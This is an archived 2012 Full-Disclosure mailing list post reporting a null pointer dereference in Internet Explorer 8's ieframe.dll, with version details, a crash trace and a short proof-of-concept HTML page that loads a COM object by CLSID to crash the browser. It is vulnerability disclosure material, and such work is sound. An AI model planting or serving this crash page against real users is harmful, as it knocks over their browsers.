[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Windows Internet Explorer(ieframe.dll) null pointer dereference

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Windows Internet Explorer(ieframe.dll) null pointer dereference
From: kaveh ghaemmaghami <kavehghaemmaghami@xxxxxxxxxxxxxx>
Date: Sun, 19 Aug 2012 03:59:07 -0700

Exploit Title: Windows Internet Explorer(ieframe.dll) null pointer dereference
Crash:http://img221.imageshack.us/img221/273/nullt.png
Date: 2012-08-19
Author: coolkaveh
coolkaveh@xxxxxxxxxxxxxx
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.microsoft.com/
Version: 8.00.6001.23345
Tested on: windows XP SP3 ENG
=====================================================================================================
COM Object Filename : C:\WINDOWS\system32\ieframe.dll
Major Version       : 8
Minor Version       : 0
Build Number        : 6001
Revision Number     : 23345
Product Version     : 8.00.6001.23345
Product Name        : Windows® Internet Explorer
Company Name        : Microsoft Corporation
Legal Copyright     : © Microsoft Corporation. All rights reserved.
Comments            : not found
File Description    : Internet Explorer
File Version        : 8.00.6001.23345 (longhorn_ie8_ldr.120423-2015)
Internal Name       : IEFRAME.DLL
=====================================================================================================
***     IE Exception      ***
*****************************************************************************************************
EXCEPTION ACCESS VIOLATION(0xc0000005): instruction address:
0x3E51FD30, invalid read from 0x00000000
*****************************************************************************************************
=====================================================================================================
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
  <title>coolkaveh</title>
  <meta name="GENERATOR" content="Evrsoft First Page">
</head>

<body bgcolor="black">
  <p><font style="BACKGROUND-COLOR: #000000" color="#FFFFFF">&nbsp;</font></p>

  <p align="center"><font style="BACKGROUND-COLOR: #000000"
color="#FFFFFF"><font color="#FFFFFF"><font><font
style="BACKGROUND-COLOR: #000000"><strong><font size=
  
"5">|------------------------------------------|</font></strong></font></font></font></font></p>

  <p align="center"><strong><font color="#FFFFFF" size="5"><font
style="BACKGROUND-COLOR: #000000"><font color="#FF0000">Awsome
coolkaveh</font></font></font></strong></p>

  <p align="center"><strong><font style="BACKGROUND-COLOR: #000000"
color="#FFFFFF"
size="5">|------------------------------------------|</font></strong></p><object
style=
  "WIDTH: 100px; HEIGHT: 350px" id="TestObj"
classid="CLSID:{07C45BB1-4A8C-4642-A1F5-237E7215FF66}">
    </object>
</body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ MDVSA-2012:140 ] mono
Next by Date: [Full-disclosure] ocPoral CMS 8.x | Cross Site Request Forgery (CSRF) Vulnerability
Previous by thread: [Full-disclosure] [ MDVSA-2012:140 ] mono
Next by thread: [Full-disclosure] ocPoral CMS 8.x | Cross Site Request Forgery (CSRF) Vulnerability
Index(es):
- Date
- Thread